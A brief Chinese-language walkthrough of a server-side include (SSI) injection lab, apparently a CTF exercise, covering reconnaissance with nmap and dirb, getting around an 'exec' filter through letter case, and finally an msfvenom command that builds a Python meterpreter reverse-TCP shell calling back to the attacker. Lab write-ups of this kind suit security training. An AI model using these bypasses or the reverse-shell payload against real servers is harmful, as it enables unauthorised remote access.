SSI注入
SSI(server side inject)的出现是为了赋予html静态页面动态的效果,通过SSI来执行系统命令,并返回对应的结果。
如果在网站目录中发现了 .stm, .shtm .shtml,并且网站对于SSL的输入没有做到严格过滤,很有可能被SSI注入攻击。
过程:
打开我们的kali攻击机和靶场
老套路终端ifconfig查看攻击机ip nmap扫描出靶场ip
dirb探测靶场 看到出来很多链接 我们都打开试一下 看有没有有用信息
在robots里边有隐藏信息 打开隐藏信息 发现有两个文件 下载打开 里边说明了靶场的一些信息
然后打开ssi 是一堆文字 而且返回了攻击机的ip 可能是一个ssi注入的靶场
然后我们打开index 发现有一条指令 可能用得到 先保存下来
打开靶场ip 看到下边有让登录的地方 输入我们刚才得到的指令 发现前边的exec被过滤掉了 修改大小写发现可以绕过过滤
但是还是没有登录成功 在pass指令前加一个! 登录成功 并且看到了返回的文字
回到我们的终端 在桌面制作shell 并且启动监听 设置端口值 并且查看
下图是命令 但是我用的是python所以命令应该是
msfvenom -p python/meterpreter/reverse_tcp lhost=攻击机IP地址 lport=4444 -f raw > /root/Desktop/shell.py